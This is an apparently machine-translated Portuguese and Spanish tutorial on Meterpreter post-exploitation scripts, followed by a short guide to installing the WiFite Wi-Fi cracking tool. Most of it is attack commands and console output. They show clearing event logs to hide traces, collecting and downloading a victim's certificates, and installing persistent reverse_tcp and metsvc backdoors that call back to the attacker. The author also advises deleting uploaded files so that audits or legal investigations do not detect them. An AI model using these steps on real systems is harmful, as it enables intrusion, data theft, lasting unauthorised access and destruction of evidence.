Fornece informações sobre os programas que têm sido frequentemente utilizados no sistema comprometido, datas de acesso e criação de cada um dos programas encontrados relatórios, este script usa um executável que deve ser incluído no quadro, no caso de que não foi encontrada, ela irá tentar fazer o download do Internet automaticamente, assim que você precisa ter para usar internet (se você tiver o arquivo no diretório prefetch.exe Metasploit) esse arquivo é instalado no <msf_install_directory>/data/prefetch.exe

meterpreter > run prefetchtool -h
[*] Prefetch-tool Meterpreter ScriptOPTIONS:-c Disable SHA1/MD5 checksum-h Help menu.

-i Perform lookup for software name

-l Download Prefetch Folder Analysis Log

-p List Installed Programs

-x <opt> Top x Accessed Executables (Based on Prefetch folder)

meterpreter > run prefetchtool -x 3 -c

[*] No local copy of prefetch.exe, downloading from the internet…

[*] Downloaded prefetch.exe to /opt/metasploit3/msf3/data/prefetch.exe

[*] Running Prefetch-tool script…

[*] Uploading Prefetch-tool for analyzing Prefetch folder…

[*] Prefetch-tool uploaded as C:\DOCUME~1\Owner\LOCALS~1\Temp\18337.exe

[*] OUT> Analyzing 120 of 121 files

[*] OUT> Analyzing 121 of 121 files

[*] OUT>

[*] OUT> * Top 3 Used Executables (Based on Prefetch Folder) *

[*] OUT> (1) Filename: avgcmgr.exe

[*] OUT> Num of Times Run: 222 times

[*] OUT> Last Run: Wed Mar 09 20:39:51 2011

[*] OUT> (2) Filename: wuauclt.exe

[*] OUT> Num of Times Run: 109 times

[*] OUT> Last Run: Sun Mar 13 01:58:22 2011

[*] OUT> (3) Filename: postgres.exe

[*] OUT> Num of Times Run: 104 times

[*] OUT> Last Run: Tue Mar 08 22:07:50 2011

[*] Deleting 64162.exe from target…

[*] Clearing prefetch-tool prefetch entry …

[*] [*] Saving prefetch logs to /root/.msf3/logs/prefetch/192.168.1.34-20110314.4236.log…

[*] [*] Deleting log file from target…

getcountermeasure

Este script fornece informações sobre os sistemas de segurança implementados no alvo, tais como AV e regras de firewall, e se possível tentar matar o processo.

meterpreter > run getcountermeasure
[*] Running Getcountermeasure on the target…[*] Checking for contermeasures…[*] Getting Windows Built in Firewall configuration…[*]

[*] Domain profile configuration:

[*] ——————————————————————-

[*] Operational mode = Enable

[*] Exception mode = Enable

[*]

[*] Standard profile configuration (current):

[*] ——————————————————————-

[*] Operational mode = Disable

[*] Exception mode = Enable

[*]

[*] Local Area Connection firewall configuration:

[*] ——————————————————————-

[*] Operational mode = Enable

[*]

[*] Checking DEP Support Policy…

[*] DEP is limited to Windows system binaries.

clearev

Este é um utilitário interessante que permite que você apague todos os arquivos de log gravadas no caso de a máquina comprometida, desta forma você pode esconder os vestígios das ações realizadas e foram provavelmente monitorado.

Em um sistema Windows, a ferramenta para exibir o log está localizado em Configuração → Ferramentas Administrativas → Visualizador de Eventos

Depois de executar o script que você pode ver que o aplicativo não contém todas as entradas relacionadas a atividades realizadas no sistema, deixando apenas um rastro indicando que o sistema executou uma auditoria automático com sucesso.

meterpreter > clearev
[*] Wiping 874 records from Application…[*] Wiping 2076 records from System…[*] Wiping 0 records from Security…meterpreter>

file_collector

 Este é um script que permite que você encontrar certos padrões de arquivos em um determinado diretório, desta forma você pode encontrar todos os arquivos com um nome e / ou a extensão indicada nos parâmetros do comando.

meterpreter > run file_collector
Meterpreter Script for searching and downloading files thatmatch a specific pattern. First save files to a file, edit anduse that same file to download the choosen files.OPTIONS:

-d <opt> Directory to start search on, search will be recursive.

-f <opt> Search blobs separated by a |.

-h Help menu.

-i <opt> Input file with list of files to download, one per line.

-l <opt> Location where to save the files.

-o <opt> Output File to save the full path of files found.

-r Search subdirectories.

Las opciones obligatorias son -d y -f para especificar el directorio de búsqueda y el filtro respectivamente, el siguiente ejemplo, busca todos los certificados almacenados en la partición C del disco duro, al igual que cualquier fichero con extensión .exploit

meterpreter > run file_collector -d C:\\ -f .cer|.exploit -r
[*] Searching for *.cer[*] C:\141381ad8e9662ef875b54bf39\x86\setup\sql_engine_core_inst_msi\pfiles\sqlservr\mssql.x\mssql\install\gdryknrt.cer (517 bytes)[*] C:\Documents and Settings\Owner\Desktop\mycertificate.cer (745 bytes)[*] C:\Program Files\Adobe\Reader 10.0\Reader\pmd.cer (420 bytes)

[*] C:\RECYCLER\S-1-5-21-1004336348-1957994488-842925246-1003\Dc6.cer (784 bytes)

[*] C:\RECYCLER\S-1-5-21-1004336348-1957994488-842925246-1003\Dc8.cer (740 bytes)

Como puede apreciarse, se han encontrado algunos certificados de usuario y son listados en el resultado, aunque no se haya encontrado nada sobre el otro filtro de búsqueda indicado.

Otra opción interesante es -o que nos permite especificar un fichero de salida, donde podremos almacenar los resultados del comando, Sin embargo no se queda aquí, también podemos obtener dichos ficheros y almacenarlos en local con el uso de la opción -l

meterpreter > run file_collector -l /opt/metasploit3/msf3/stoled/ -i /opt/metasploit3/msf3/stoled/files_stoled
[*] Reading file /opt/metasploit3/msf3/stoled/files_stoled[*] Downloading to /opt/metasploit3/msf3/stoled/[*] Downloading C:\141381ad8e9662ef875b54bf39\x86\setup\sql_engine_core_inst_msi\pfiles\sqlservr\mssql.x\mssql\install\gdryknrt.cer[*] Downloading C:\Documents and Settings\Owner\Desktop\mycertificate.cer

[*] Downloading C:\Program Files\Adobe\Reader 10.0\Reader\pmd.cer

[*] Downloading C:\RECYCLER\S-1-5-21-1004336348-1957994488-842925246-1003\Dc6.cer

[*] Downloading C:\RECYCLER\S-1-5-21-1004336348-1957994488-842925246-1003\Dc8.cer

persistence

Uma vez explorado um sistema, uma porta persistente que nos permite conectar a qualquer momento para o nosso objetivo, sem explorá-lo novamente é desejável para executar esta tarefa, existem algumas outras maneiras que envolvem a modificação do registro do Windows manualmente, neste caso, vamos fazer uso de uma das cargas que existem em uma sessão meterpreter para instalar o serviço.

Nota: Não especifique um valor para a autenticação, o que significa que qualquer usuário na máquina remota, pode fazer uma conexão com o backdoor, isso pode ser um risco de segurança elevado, por isso recomenda-se cautela e limpar qualquer registro (traço) após ter terminado a execução das tarefas.

meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.OPTIONS:-A Automatically start a matching multi/handler to connect to the agent-L <opt> Location in target host where to write payload to, if none %TEMP% will be used.

-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.

-S Automatically start the agent on boot as a service (with SYSTEM privileges)

-T <opt> Alternate executable template to use

-U Automatically start the agent when the User logs on

-X Automatically start the agent when the system boots

-h This help menu

-i <opt> The interval in seconds between each connection attempt

-p <opt> The port on the remote host where Metasploit is listening

-r <opt> The IP of the system running Metasploit listening for the connect back

meterpreter > run persistence -U -i 5 -p 4444 -r 192.168.1.33

[*] Running Persistance Script

[*] Resource file for cleanup created at /root/.msf3/logs/persistence/OWNER_20110307.1848/OWNER_20110307.1848.rc

[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.33 LPORT=4444

[*] Persistent agent script is 610514 bytes long

[+] Persisten Script written to C:\WINDOWS\TEMP\cJYeLTeHhKhX.vbs

[*] Executing script C:\WINDOWS\TEMP\cJYeLTeHhKhX.vbs

[+] Agent executed with PID 2840

[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\DfctDISwu

[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\DfctDISwu

Agora você pode reiniciar a máquina comprometida, a fim de iniciar o processo recém-criado, isso pode ser feito com o comando reboot e uma vez que o usuário fizer logon novamente, a conexão com a máquina do atacante começará, portanto, a máquina deve ser preparada com um exploit e um PAYLOAD adequado como reverse_tcp, reverse_http, reverse_https ou metsvc_bind_tcp

metsrv

Outra maneira de manter o acesso a um alvo, é através do estabelecimento de um backdoor, você pode definir uma backdoor através do uso de extensão meterpreter metsvc desta forma pode, em seguida, acessar o cliente sem esperar a máquina novamente estabelecer a conexão.

Uma vez que é necessário encontrar o processo explorer (onde procuraremos o backdoor), mas não têm necessariamente de ser este processo especial, pois você pode executar o comando em qualquer processo válido identificador da sessão meterpreter obtido, indica a processo “explorer”, uma vez que é um dos processos mais importantes do sistema operacional:

meterpreter > ps
Process list============PID Name Arch Session User Path— —- —- ——- —- —-

0 [System Process]

4 System x86 0 NT AUTHORITY\SYSTEM

476 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe

….

meterpreter > migrate 244

[*] Migrating to 244…

[*] Migration completed successfully.

Uma vez que o processo de migração, você pode executar o comando

meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337[*] Creating a temporary installation directory C:\DOCUME~1\Owner\LOCALS~1\Temp\lZBdswMe…[*] >> Uploading metsrv.dll…[*] >> Uploading metsvc-server.exe…

[*] >> Uploading metsvc.exe…

[*] Starting the service…

* Installing service metsvc

* Starting service

Service metsvc successfully installed.

Se já existe um backdoor instalado é possível excluir com a opção-r.

Agora que a porta da bagageira é estabelecida, você pode começar a qualquer momento uma ponte inversa para a máquina do atacante automaticamente, assim você pode usar o multi / handler explorar para realizar essas ações, além disso, uma carga definida para realizar a conexão imediata entre as duas máquinas:

msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcpmsf exploit(handler) > set RHOST 192.168.1.34

RHOST => 192.168.1.34

msf exploit(handler) > set LPORT 31337

LPORT => 31337

msf exploit(handler) > exploit

[*] Starting the payload handler…

[*] Started bind handler

[*] Meterpreter session 4 opened (192.168.1.33:38034 -> 192.168.1.34:31337) at Sun Mar 06 21:53:51 +0100 2011

meterpreter >

NOTA: Embora você pode remover este backdoor, na verdade o que a opção-r é para remover as entradas de registro da máquina remota, mas os arquivos carregadas na máquina, não é excluída, portanto, é importante realizar o apagamento de bibliotecas (. dll) e arquivos executáveis ​​(. exe) manualmente para evitar deixar vestígios que podem ser facilmente detectadas por uma auditoria de software ou de um processo judicial, além de que também é necessário para encerrar qualquer processo que está executando e dependente dos arquivos.

WiFite: Wireless cracking para preguiçosos

WiFite é um aplicativo para quebrar senhas de redes Wi-Fi criptografadas WEP e WPA. Neste caso, todo o trabalho é feito pelo WiFite, você só tem que especificar a rede que deseja quebrar e o programa cuida de tudo.

Ele permite que você trabalhe com “múltiplos ataques” em redes criptografadas com WEP e WPA. Esta é uma ferramenta personalizável para trabalhar de forma autônoma com alguns parâmetros de forma rápida e eficiente.

WiFite

 

Obtendo o WiFite

O aplicativo pode ser obtido de forma rápida e fácil pelo seu repositório oficial emhttp://code.google.com/p/wifite/downloads/list onde estamos nesta data de hoje (16.11.2013) na versão 2.0 e você pode usar o wget http://wifite.googlecode.com/files/wifite-2.0r85.tar.gz para obter o pacote. Lembre-se de ler o README do pacote ou semelhantes para saber como efetuar a instalação por sua vez deverá vir um executável que deve ser aberto ./programa ou será necessário lhe dar permissão de execução chmod +x programa.

 

O WiFite depende do AirCrack-Ng, outra ferramenta para bruteforce em redes Wi-Fi, console mode, nativa do BackTrack que pode ser obtida no link http://www.aircrack-ng.org/downloads.html.

Instale também os seguintes pacotes (libssl, libpcap, libdigest e macchanger)
sudo apt-get install macchanger pyrit
sudo apt-get install libssl-dev libpcap0.8-dev libdigest-hmac-perl

Instale também o CowPatty disponível em http://wirelessdefence.org/Contents/coWPAttyMain.htm e reinicie sua sessão.

Agora que reiniciou execute o wifite.py e voalá, estará pronto para você efetuar seus testes.

Fonte:SecurityHacker